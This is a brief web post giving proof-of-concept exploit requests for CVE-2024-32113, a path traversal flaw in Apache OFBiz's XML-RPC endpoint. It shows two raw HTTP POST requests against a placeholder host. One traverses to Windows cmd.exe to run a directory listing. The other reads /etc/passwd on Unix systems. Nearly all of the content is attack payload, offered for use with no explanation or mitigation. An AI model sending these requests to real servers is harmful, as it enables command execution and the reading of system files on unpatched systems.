CVE-2024-32113 Apache-OFBiz
*
POC WIN
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
performCommand ../../../../../../windows/system32/cmd.exe?/c+dir+c:\
POC for *NIX
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
example.createBlogPost ../../../../../../etc/passwd
What do you think?
It is nice to know your opinion. Leave a comment.